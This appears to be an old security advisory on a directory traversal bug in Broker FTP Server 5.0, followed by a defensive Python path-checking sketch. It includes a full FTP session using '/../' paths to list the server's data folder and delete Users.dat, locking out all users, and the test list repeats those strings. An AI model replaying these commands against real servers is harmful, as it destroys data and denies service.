COMMAND
Broker Ftp Server
SYSTEMS AFFECTED
Broker Ftp Server 5.0
PROBLEM
'se00020' found the following. Users can break out of their root
directory and list directories. Depending on the privileges you
have, other commands such as delete may be executed outside of the
home directory. e:\crap\ was used as the home directory; deleting
files in e:\crap is enabled:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden 323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission
ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 175 Nov 19 2000 UserGrps.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Users.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33 Users.4800.bak
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34 Users.4800-Prof.bak
-rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59 BannCtrl.ini
-rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08 KickCtrl.ini
-rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37 Events_1.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53 Events_lst_1.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden 629000,00KB/s
ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat' deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.
C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp>
By deleting users.dat, no one will be able to log on. This was
tested with Win2k and the trial version of Broker v5.0.
SOLUTION
Nothing yet.
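
In the session above, "cd .." is refused while "dir" and "delete" accept a
"/../" path. The following is an added example, not Broker's code and not a
vendor fix: a sketch of the server-side check that closes this class of bug by
sending every path-taking command through one resolver. The names resolve,
audit and SESSION are hypothetical, and the command list is constructed from
the session.

```python
import ntpath  # Windows path rules, usable on any host OS

HOME = r"e:\crap"  # home directory used in the session above

def resolve(home, cwd, arg):
    """Map an FTP path argument to a real path under home, or None on escape.

    cwd is the client's current virtual directory ("/" is the home root).
    """
    # Drive letters, alternate data streams and NUL bytes never belong here.
    if ":" in arg or "\x00" in arg:
        return None
    virt = arg.replace("\\", "/")
    if not virt.startswith("/"):
        virt = cwd.rstrip("/") + "/" + virt  # relative to the virtual cwd
    stack = []
    for part in virt.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:        # ".." above the virtual root
                return None
            stack.pop()
        else:
            stack.append(part)
    real = ntpath.normpath(ntpath.join(home, *stack))
    # Second check on the final string, case-insensitive as on Windows.
    root = ntpath.normcase(ntpath.normpath(home))
    low = ntpath.normcase(real)
    if low != root and not low.startswith(root + "\\"):
        return None
    return real

# Constructed from the commands in the session (cd -> CWD, dir -> LIST,
# delete -> DELE), plus two legitimate requests for contrast.
SESSION = [
    ("CWD", ".."),
    ("LIST", "/../experimental/broker/data/"),
    ("DELE", "/../experimental/broker/data/users.dat"),
    ("LIST", "test"),
    ("DELE", "movedtohomedir.txt"),
]

def audit(session, home=HOME, cwd="/"):
    """Return (command, argument, verdict) using the same resolver for all."""
    return [(c, a, "550" if resolve(home, cwd, a) is None else "ok")
            for c, a in session]

if __name__ == "__main__":
    for row in audit(SESSION):
        print(*row)
```

The check works on path strings only; it does not follow NTFS junctions, so a
server should also verify the location of the file it finally opens.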